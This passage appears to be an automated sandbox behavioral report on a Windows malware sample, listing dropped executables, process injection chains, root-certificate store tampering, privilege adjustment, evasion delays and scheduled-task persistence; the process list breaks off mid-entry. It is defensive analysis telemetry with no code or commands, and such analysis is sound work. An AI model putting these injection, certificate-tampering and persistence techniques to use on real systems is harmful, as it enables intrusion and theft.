Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob data omitted] C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob data omitted] C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob data omitted] C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2160 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2160 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2160 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2160 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2668 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2668 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2668 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2668 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1728 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2876 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 1504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 2668 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 2668 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 2668 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 1488 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe C:\Users\Admin\AppData\Local\Temp\dll32.exe
PID 1488 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe C:\Users\Admin\AppData\Local\Temp\dll32.exe
PID 1488 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe C:\Users\Admin\AppData\Local\Temp\dll32.exe
PID 2668 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 2668 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 2668 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 2668 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 2668 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 2668 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 2668 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 2668 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 1040 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe C:\Windows\SysWOW64\WerFault.exe
PID 1040 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe C:\Windows\SysWOW64\WerFault.exe
PID 1040 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe C:\Windows\SysWOW64\WerFault.exe
PID 1040 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2668 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2668 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2668 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2608 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2608 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe

"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

